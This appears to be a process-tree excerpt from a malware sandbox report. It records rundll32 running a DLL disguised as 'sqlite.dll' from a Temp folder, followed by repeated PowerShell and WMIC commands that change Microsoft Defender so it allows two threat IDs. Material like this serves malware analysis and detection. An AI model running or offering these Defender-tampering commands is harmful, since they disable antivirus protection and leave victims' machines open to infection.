C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:976 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:5460
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:5868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:4740
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:4400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:6988
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:6156
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:6132
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:2700
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:1400
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:5292
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵PID:4716
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True1⤵PID:6172
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True2⤵PID:3688
-